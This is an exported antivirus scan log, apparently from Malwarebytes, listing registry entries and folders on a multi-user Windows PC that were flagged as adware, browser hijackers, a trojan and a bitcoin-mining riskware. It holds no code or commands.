Malware.AI.1177501665, HKLM\SOFTWARE\CLASSES\WOW6432NODE\INTERFACE\{D83B296A-2FA6-425B-8AE8-A1F33D99FBD6}, No Action By User, 1000000, 0, , , , , , 
Malware.AI.1177501665, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{452AE416-9A97-44CA-93DA-D0F15C36254F}, No Action By User, 1000000, 0, , , , , , 
Malware.AI.1177501665, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{45CDA4F7-594C-49A0-AAD1-8224517FE979}, No Action By User, 1000000, 0, , , , , , 
Malware.AI.1177501665, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{81E852CC-1FD5-4004-8761-79A48B975E29}, No Action By User, 1000000, 0, , , , , , 
Malware.AI.1177501665, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{B2CA345D-ADB8-4F5D-AC64-4AB34322F659}, No Action By User, 1000000, 0, , , , , , 
Malware.AI.1177501665, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{B9F43021-60D4-42A6-A065-9BA37F38AC47}, No Action By User, 1000000, 0, , , , , , 
Malware.AI.1177501665, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{BF921DD3-732A-4A11-933B-A5EA49F2FD2C}, No Action By User, 1000000, 0, , , , , , 
Malware.AI.1177501665, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{D83B296A-2FA6-425B-8AE8-A1F33D99FBD6}, No Action By User, 1000000, 0, , , , , , 
Malware.AI.1177501665, HKLM\SOFTWARE\WOW6432NODE\CLASSES\TYPELIB\{B87F8B63-7274-43FD-87FA-09D3B7496148}, No Action By User, 1000000, 0, , , , , , 
Malware.AI.1177501665, HKLM\SOFTWARE\CLASSES\WOW6432NODE\TYPELIB\{B87F8B63-7274-43FD-87FA-09D3B7496148}, No Action By User, 1000000, 0, , , , , , 
 
Registry Value: 87
PUP.Optional.SearchProtect.AppFlsh, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS|APPINIT_DLLS, No Action By User, 1613, -1, 0.0.0, , action, , , 
PUP.Optional.SearchProtect.AppFlsh, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS|APPINIT_DLLS, No Action By User, 1613, -1, 0.0.0, , action, , , 
PUP.Optional.CrossRider, HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{7054e672-778c-4582-94e9-56a07b85591c}|APPNAME, No Action By User, 502, 237487, 1.0.49973, , ame, , , 
PUP.Optional.CrossRider, HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{a37804e0-4c35-486f-9197-5b486daf6aa6}|APPNAME, No Action By User, 502, 237488, 1.0.49973, , ame, , , 
PUP.Optional.CrossRider, HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{ABFC64F0-D9E3-43A6-9927-45B868125E5D}|APPNAME, No Action By User, 502, 237487, 1.0.49973, , ame, , , 
PUP.Optional.CrossRider, HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{b353d28d-147e-47c1-9a5c-07a62dd50861}|APPNAME, No Action By User, 502, 237486, 1.0.49973, , ame, , , 
PUP.Optional.PCKeeper, HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOWREGISTRY\AUDIO\POLICYCONFIG\PROPERTYSTORE\e51541fd_0|, No Action By User, 1335, 260411, 1.0.49973, , ame, , , 
PUP.Optional.WinYahoo, HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{786CACE0-4B52-4B5E-9B22-4A8063236C63}|URL, No Action By User, 228, 182757, 1.0.49973, , ame, , , 
PUP.Optional.Inbox, HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{C04B7D22-5AEC-4561-8F49-27F6269208F6}|URL, No Action By User, 5070, 185435, 1.0.49973, , ame, , , 
PUP.Optional.Inbox, HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{C04B7D22-5AEC-4561-8F49-27F6269208F6}|SUGGESTIONSURL_JSON, No Action By User, 5070, 253687, 1.0.49973, , ame, , , 
PUP.Optional.Inbox, HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{C04B7D22-5AEC-4561-8F49-27F6269208F6}|FAVICONURLFALLBACK, No Action By User, 5070, 185435, 1.0.49973, , ame, , , 
PUP.Optional.ASK, HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{F48980A0-589B-49F1-A35C-E7FF0B3C1B87}|URL, No Action By User, 268, 258187, 1.0.49973, , ame, , , 
PUP.Optional.PCKeeper, HKU\S-1-5-21-1250379553-2428740185-3603661230-501\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|PCKEEPERLIVE, No Action By User, 1335, 260399, 1.0.49973, , ame, , , 
PUP.Optional.AppGraffiti, HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|AGupdate, No Action By User, 1008, 235494, , , , , , 
PUP.Optional.AppGraffiti, HKU\S-1-5-21-1250379553-2428740185-3603661230-501\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|AGUPDATE, No Action By User, 1008, 235494, 1.0.49973, , ame, , , 
PUP.Optional.Toolbar.Generic, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{628F3201-34D0-49C0-BB9A-82A26AEFB291}|APPNAME, No Action By User, 5831, 549624, 1.0.49973, , ame, , , 
PUP.Optional.CrossRider, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{7054e672-778c-4582-94e9-56a07b85591c}|APPNAME, No Action By User, 502, 237509, 1.0.49973, , ame, , , 
PUP.Optional.CrossRider, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{a37804e0-4c35-486f-9197-5b486daf6aa6}|APPNAME, No Action By User, 502, 237510, 1.0.49973, , ame, , , 
PUP.Optional.CrossRider, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{b353d28d-147e-47c1-9a5c-07a62dd50861}|APPNAME, No Action By User, 502, 237508, 1.0.49973, , ame, , , 
PUP.Optional.MyWebSearch, HKU\S-1-5-21-1250379553-2428740185-3603661230-1003\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{b0441a0e-a49a-4e16-afc1-74ecced1921f}|URL, No Action By User, 4645, 241108, 1.0.49973, , ame, , , 
PUP.Optional.MySearchDial, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}|URL, No Action By User, 108, 241083, 1.0.49973, , ame, , , 
PUP.Optional.MySearchDial, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}|TOPRESULTURLFALLBACK, No Action By User, 108, 241083, 1.0.49973, , ame, , , 
PUP.Optional.MySearchDial, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}|FAVICONPATH, No Action By User, 108, 241083, 1.0.49973, , ame, , , 
PUP.Optional.MySearchDial, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}|, No Action By User, 108, 241083, 1.0.49973, , ame, , , 
PUP.Optional.MySearchDial, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}|DISPLAYNAME, No Action By User, 108, 241083, 1.0.49973, , ame, , , 
PUP.Optional.PCKeeper, HKU\S-1-5-21-1250379553-2428740185-3603661230-1003\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|PCKEEPERLIVE, No Action By User, 1335, 260399, 1.0.49973, , ame, , , 
PUP.Optional.WinYahoo, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}|URL, No Action By User, 228, 182758, 1.0.49973, , ame, , , 
PUP.Optional.CrossRider.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{25C3FE4E-7C48-447D-BAC5-141069528E0A}|PATH, No Action By User, 1950, 260101, 1.0.49973, , ame, , , 
PUP.Optional.CrossRider.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{50705818-630E-4136-BA82-0DB9119DA4AC}|PATH, No Action By User, 1950, 259453, 1.0.49973, , ame, , , 
PUP.Optional.MySearchDial, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{7158081D-DF25-4E71-BC14-844441C6B587}|PATH, No Action By User, 108, 332361, 1.0.49973, , ame, , , 
PUP.Optional.SlimCleanerPlus, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{8FB062A9-BD13-42B5-B65F-B285C09B088E}|PATH, No Action By User, 1633, 334102, 1.0.49973, , ame, , , 
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{A26E4F53-0C1D-47E6-93D4-2B1380751BD0}|PATH, No Action By User, 5648, 430791, 1.0.49973, , ame, , , 
RiskWare.BitCoinMiner, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{DB61A594-DCB9-421A-A376-D887F795D957}|PATH, No Action By User, 897, 770537, 1.0.49973, , ame, , , 
PUP.Optional.CrossRider, HKU\S-1-5-21-1250379553-2428740185-3603661230-501\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{7054e672-778c-4582-94e9-56a07b85591c}|APPNAME, No Action By User, 502, 237487, 1.0.49973, , ame, , , 
PUP.Optional.CrossRider, HKU\S-1-5-21-1250379553-2428740185-3603661230-501\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{a37804e0-4c35-486f-9197-5b486daf6aa6}|APPNAME, No Action By User, 502, 237488, 1.0.49973, , ame, , , 
PUP.Optional.CrossRider, HKU\S-1-5-21-1250379553-2428740185-3603661230-501\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{ABFC64F0-D9E3-43A6-9927-45B868125E5D}|APPNAME, No Action By User, 502, 237487, 1.0.49973, , ame, , , 
PUP.Optional.CrossRider, HKU\S-1-5-21-1250379553-2428740185-3603661230-501\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{b353d28d-147e-47c1-9a5c-07a62dd50861}|APPNAME, No Action By User, 502, 237486, 1.0.49973, , ame, , , 
PUP.Optional.PCKeeper, HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOWREGISTRY\AUDIO\POLICYCONFIG\PROPERTYSTORE\e51541fd_0|, No Action By User, 1335, 260411, 1.0.49973, , ame, , , 
PUP.Optional.ASK, HKU\S-1-5-21-1250379553-2428740185-3603661230-501\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{4AAD6DF8-F7F8-4E3E-91A5-B7C706FA8A12}|URL, No Action By User, 268, 258187, 1.0.49973, , ame, , , 
PUP.Optional.WinYahoo, HKU\S-1-5-21-1250379553-2428740185-3603661230-501\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{786CACE0-4B52-4B5E-9B22-4A8063236C63}|URL, No Action By User, 228, 182757, 1.0.49973, , ame, , , 
PUP.Optional.Inbox, HKU\S-1-5-21-1250379553-2428740185-3603661230-501\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{C04B7D22-5AEC-4561-8F49-27F6269208F6}|URL, No Action By User, 5070, 185435, 1.0.49973, , ame, , , 
PUP.Optional.Inbox, HKU\S-1-5-21-1250379553-2428740185-3603661230-501\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{C04B7D22-5AEC-4561-8F49-27F6269208F6}|SUGGESTIONSURL_JSON, No Action By User, 5070, 253687, 1.0.49973, , ame, , , 
PUP.Optional.Inbox, HKU\S-1-5-21-1250379553-2428740185-3603661230-501\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{C04B7D22-5AEC-4561-8F49-27F6269208F6}|FAVICONURLFALLBACK, No Action By User, 5070, 185435, 1.0.49973, , ame, , , 
PUP.Optional.ASK, HKU\S-1-5-21-1250379553-2428740185-3603661230-501\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{F48980A0-589B-49F1-A35C-E7FF0B3C1B87}|URL, No Action By User, 268, 258187, 1.0.49973, , ame, , , 
PUP.Optional.MyWebSearch, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{b0441a0e-a49a-4e16-afc1-74ecced1921f}|URL, No Action By User, 4645, 241109, 1.0.49973, , ame, , , 
PUP.Optional.CrossRider, HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{7054e672-778c-4582-94e9-56a07b85591c}|APPNAME, No Action By User, 502, 237487, 1.0.49973, , ame, , , 
PUP.Optional.CrossRider, HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{a37804e0-4c35-486f-9197-5b486daf6aa6}|APPNAME, No Action By User, 502, 237488, 1.0.49973, , ame, , , 
PUP.Optional.CrossRider, HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{ABFC64F0-D9E3-43A6-9927-45B868125E5D}|APPNAME, No Action By User, 502, 237487, 1.0.49973, , ame, , , 
PUP.Optional.CrossRider, HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{b353d28d-147e-47c1-9a5c-07a62dd50861}|APPNAME, No Action By User, 502, 237486, 1.0.49973, , ame, , , 
PUP.Optional.PCKeeper, HKU\S-1-5-21-1250379553-2428740185-3603661230-501\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOWREGISTRY\AUDIO\POLICYCONFIG\PROPERTYSTORE\e51541fd_0|, No Action By User, 1335, 260411, 1.0.49973, , ame, , , 
PUP.Optional.MyWebSearch, HKU\S-1-5-21-1250379553-2428740185-3603661230-501\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{cca2e567-1987-4100-a3c6-5b4267084510}|URL, No Action By User, 4645, 241108, 1.0.49973, , ame, , , 
PUP.Optional.WinYahoo, HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{786CACE0-4B52-4B5E-9B22-4A8063236C63}|URL, No Action By User, 228, 182757, 1.0.49973, , ame, , , 
PUP.Optional.Inbox, HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{C04B7D22-5AEC-4561-8F49-27F6269208F6}|URL, No Action By User, 5070, 185435, 1.0.49973, , ame, , , 
PUP.Optional.Inbox, HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{C04B7D22-5AEC-4561-8F49-27F6269208F6}|SUGGESTIONSURL_JSON, No Action By User, 5070, 253687, 1.0.49973, , ame, , , 
PUP.Optional.Inbox, HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{C04B7D22-5AEC-4561-8F49-27F6269208F6}|FAVICONURLFALLBACK, No Action By User, 5070, 185435, 1.0.49973, , ame, , , 
PUP.Optional.ASK, HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{F48980A0-589B-49F1-A35C-E7FF0B3C1B87}|URL, No Action By User, 268, 258187, 1.0.49973, , ame, , , 
PUP.Optional.PCKeeper, HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|PCKEEPERLIVE, No Action By User, 1335, 260399, 1.0.49973, , ame, , , 
PUP.Optional.InstallCore, HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\PRODUCTSETUP|TB, No Action By User, 498, 481004, 1.0.49973, , ame, , , 
PUP.Optional.CrossRider.Generic, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\MAIN\FEATURECONTROL\FEATURE_BROWSER_EMULATION|INFORMATION-BG.EXE, No Action By User, 1950, 260099, 1.0.49973, , ame, , , 
PUP.Optional.WinYahoo, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}|URL, No Action By User, 228, 182758, 1.0.49973, , ame, , , 
PUP.Optional.MySearchDial.OL, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\TOOLBAR|{3004627E-F8E9-4E8B-909D-316753CBA923}, No Action By User, 5952, 342408, , , , , , 
PUP.Optional.ASK, HKU\S-1-5-21-1250379553-2428740185-3603661230-1003\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{FE2730BD-C80E-41F6-AC6A-21FF3521D2DA}|URL, No Action By User, 268, 258187, 1.0.49973, , ame, , , 
PUP.Optional.CrossRider, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{7054e672-778c-4582-94e9-56a07b85591c}|APPNAME, No Action By User, 502, 237509, 1.0.49973, , ame, , , 
PUP.Optional.CrossRider, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{a37804e0-4c35-486f-9197-5b486daf6aa6}|APPNAME, No Action By User, 502, 237510, 1.0.49973, , ame, , , 
PUP.Optional.CrossRider, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{b353d28d-147e-47c1-9a5c-07a62dd50861}|APPNAME, No Action By User, 502, 237508, 1.0.49973, , ame, , , 
PUP.Optional.InboxToolBar, HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\URLSEARCHHOOKS|{D3D233D5-9F6D-436C-B6C7-E63F77503B30}, No Action By User, 1874, 168102, , , , , , 
PUP.Optional.InboxToolBar, HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\SOFTWARE\MICROSOFT\INTERNET EXPLORER\URLSEARCHHOOKS|{D3D233D5-9F6D-436C-B6C7-E63F77503B30}, No Action By User, 1874, 168102, , , , , , 
PUP.Optional.InboxToolBar, HKU\S-1-5-21-1250379553-2428740185-3603661230-501\SOFTWARE\MICROSOFT\INTERNET EXPLORER\URLSEARCHHOOKS|{D3D233D5-9F6D-436C-B6C7-E63F77503B30}, No Action By User, 1874, 168102, , , , , , 
PUP.Optional.Produtools, HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\SOFTWARE\MICROSOFT\INTERNET EXPLORER\TOOLBAR\WEBBROWSER|{575BDDF5-790A-4D01-A37D-2863DEC1C085}, No Action By User, 1998, 168666, , , , , , 
PUP.Optional.Produtools, HKU\S-1-5-21-1250379553-2428740185-3603661230-501\SOFTWARE\MICROSOFT\INTERNET EXPLORER\TOOLBAR\WEBBROWSER|{575BDDF5-790A-4D01-A37D-2863DEC1C085}, No Action By User, 1998, 168666, , , , , , 
PUP.Optional.Produtools, HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\URLSEARCHHOOKS|{575BDDF5-790A-4D01-A37D-2863DEC1C085}, No Action By User, 1998, 168666, , , , , , 
PUP.Optional.Produtools, HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\SOFTWARE\MICROSOFT\INTERNET EXPLORER\URLSEARCHHOOKS|{575BDDF5-790A-4D01-A37D-2863DEC1C085}, No Action By User, 1998, 168666, , , , , , 
PUP.Optional.Produtools, HKU\S-1-5-21-1250379553-2428740185-3603661230-501\SOFTWARE\MICROSOFT\INTERNET EXPLORER\URLSEARCHHOOKS|{575BDDF5-790A-4D01-A37D-2863DEC1C085}, No Action By User, 1998, 168666, , , , , , 
PUP.Optional.Produtools, HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\TOOLBAR\WEBBROWSER|{575BDDF5-790A-4D01-A37D-2863DEC1C085}, No Action By User, 1998, 168666, 1.0.49973, , ame, , , 
PUP.Optional.ASK, HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\TOOLBAR\WEBBROWSER|{D4027C7F-154A-4066-A1AD-4243D8127440}, No Action By User, 268, 306571, , , , , , 
PUP.Optional.ASK, HKU\S-1-5-21-1250379553-2428740185-3603661230-1003\SOFTWARE\MICROSOFT\INTERNET EXPLORER\TOOLBAR\WEBBROWSER|{D4027C7F-154A-4066-A1AD-4243D8127440}, No Action By User, 268, 306571, , , , , , 
PUP.Optional.ASK, HKU\S-1-5-21-1250379553-2428740185-3603661230-501\SOFTWARE\MICROSOFT\INTERNET EXPLORER\TOOLBAR\WEBBROWSER|{D4027C7F-154A-4066-A1AD-4243D8127440}, No Action By User, 268, 306571, , , , , , 
PUP.Optional.ASK, HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\SOFTWARE\MICROSOFT\INTERNET EXPLORER\TOOLBAR\WEBBROWSER|{D4027C7F-154A-4066-A1AD-4243D8127440}, No Action By User, 268, 306571, 1.0.49973, , ame, , , 
PUP.Optional.InboxToolBar, HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\TOOLBAR\WEBBROWSER|{D7E97865-918F-41E4-9CD0-25AB1C574CE8}, No Action By User, 1874, 168103, , , , , , 
PUP.Optional.InboxToolBar, HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\SOFTWARE\MICROSOFT\INTERNET EXPLORER\TOOLBAR\WEBBROWSER|{D7E97865-918F-41E4-9CD0-25AB1C574CE8}, No Action By User, 1874, 168103, , , , , , 
PUP.Optional.InboxToolBar, HKU\S-1-5-21-1250379553-2428740185-3603661230-501\SOFTWARE\MICROSOFT\INTERNET EXPLORER\TOOLBAR\WEBBROWSER|{D7E97865-918F-41E4-9CD0-25AB1C574CE8}, No Action By User, 1874, 168103, 1.0.49973, , ame, , , 
PUP.Optional.MindSpark, HKU\S-1-5-21-1250379553-2428740185-3603661230-501\SOFTWARE\MICROSOFT\INTERNET EXPLORER\URLSEARCHHOOKS|{8A7D2060-824D-4B17-B00A-759B1B5F30D9}, No Action By User, 764, 168374, , , , , , 
PUP.Optional.MindSpark, HKU\S-1-5-21-1250379553-2428740185-3603661230-1003\SOFTWARE\MICROSOFT\INTERNET EXPLORER\URLSEARCHHOOKS|{8a7d2060-824d-4b17-b00a-759b1b5f30d9}, No Action By User, 764, 168374, 1.0.49973, , ame, , , 
PUP.Optional.MindSpark, HKU\S-1-5-21-1250379553-2428740185-3603661230-501\SOFTWARE\MICROSOFT\INTERNET EXPLORER\URLSEARCHHOOKS|{26842A09-FFA8-4E2C-AE12-0C80F01C3295}, No Action By User, 764, 168243, , , , , , 
PUP.Optional.MindSpark, HKU\S-1-5-21-1250379553-2428740185-3603661230-1003\SOFTWARE\MICROSOFT\INTERNET EXPLORER\URLSEARCHHOOKS|{26842a09-ffa8-4e2c-ae12-0c80f01c3295}, No Action By User, 764, 168243, 1.0.49973, , ame, , , 
PUP.Optional.MindSpark, HKU\S-1-5-21-1250379553-2428740185-3603661230-1003\SOFTWARE\MICROSOFT\INTERNET EXPLORER\TOOLBAR\WEBBROWSER|{364EA597-E728-4CE4-BB4A-ED846EF47970}, No Action By User, 764, 168268, , , , , , 
PUP.Optional.MindSpark, HKU\S-1-5-21-1250379553-2428740185-3603661230-501\SOFTWARE\MICROSOFT\INTERNET EXPLORER\TOOLBAR\WEBBROWSER|{364EA597-E728-4CE4-BB4A-ED846EF47970}, No Action By User, 764, 168268, 1.0.49973, , ame, , , 
 
Registry Data: 1
PUP.Optional.WinYahoo, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN|START PAGE, No Action By User, 228, 293461, 1.0.49973, , ame, , , 
 
Data Stream: 0
(No malicious items detected)
 
Folder: 92
PUP.Optional.ASK, C:\USERS\LINDAG\APPDATA\LOCAL\TEMP\APNLOGS, No Action By User, 268, 184754, 1.0.49973, , ame, , , 
PUP.Optional.VisualBee, C:\PROGRAMDATA\VISUALBEE, No Action By User, 169, 174256, 1.0.49973, , ame, , , 
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\LocalDB, No Action By User, 169, 175250, , , , , , 
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain, No Action By User, 169, 175250, , , , , , 
PUP.Optional.VisualBee, C:\USERS\MARILYN\APPDATA\LOCAL\VISUALBEECLIENT, No Action By User, 169, 175250, 1.0.49973, , ame, , , 
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\GuideFiles, No Action By User, 169, 175251, , , , , , 
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\Dic-Eng, No Action By User, 169, 175251, , , , , , 
PUP.Optional.MindSpark, C:\Program Files (x86)\MapsGalaxy_39EI\Installr\1.bin\chrome, No Action By User, 764, 178290, , , , , , 
PUP.Optional.MindSpark, C:\Program Files (x86)\MapsGalaxy_39EI\Installr\2.bin\chrome, No Action By User, 764, 178290, , , , , , 
PUP.Optional.MindSpark, C:\Program Files (x86)\MapsGalaxy_39EI\Installr\1.bin, No Action By User, 764, 178290, , , , , , 
PUP.Optional.MindSpark, C:\Program Files (x86)\MapsGalaxy_39EI\Installr\2.bin, No Action By User, 764, 178290, , , , , , 
PUP.Optional.MindSpark, C:\Program Files (x86)\MapsGalaxy_39EI\Installr, No Action By User, 764, 178290, , , , , , 
PUP.Optional.MindSpark, C:\PROGRAM FILES (X86)\MapsGalaxy_39EI, No Action By User, 764, 178290, 1.0.49973, , ame, , , 
PUP.Optional.OptimizerPro, C:\USERS\MARILYN\DOCUMENTS\OPTIMIZER PRO, No Action By User, 1043, 241439, 1.0.49973, , ame, , , 
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\MapsGalaxy_39\MapsGalaxy_39\Cache, No Action By User, 764, 178422, , , , , , 
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\MapsGalaxy_39\bar\Message\COMMON, No Action By User, 764, 178422, , , , , , 
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\MapsGalaxy_39\MapsGalaxy_39, No Action By User, 764, 178422, , , , , , 
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\MapsGalaxy_39\bar\Settings, No Action By User, 764, 178422, , , , , , 
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\MapsGalaxy_39\bar\History, No Action By User, 764, 178422, , , , , , 
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\MapsGalaxy_39\bar\Message, No Action By User, 764, 178422, , , , , , 
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\MapsGalaxy_39\bar\Cache, No Action By User, 764, 178422, , , , , , 
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\MapsGalaxy_39\bar, No Action By User, 764, 178422, , , , , , 
PUP.Optional.MindSpark, C:\USERS\GUEST\APPDATA\LOCALLOW\MapsGalaxy_39, No Action By User, 764, 178422, 1.0.49973, , ame, , , 
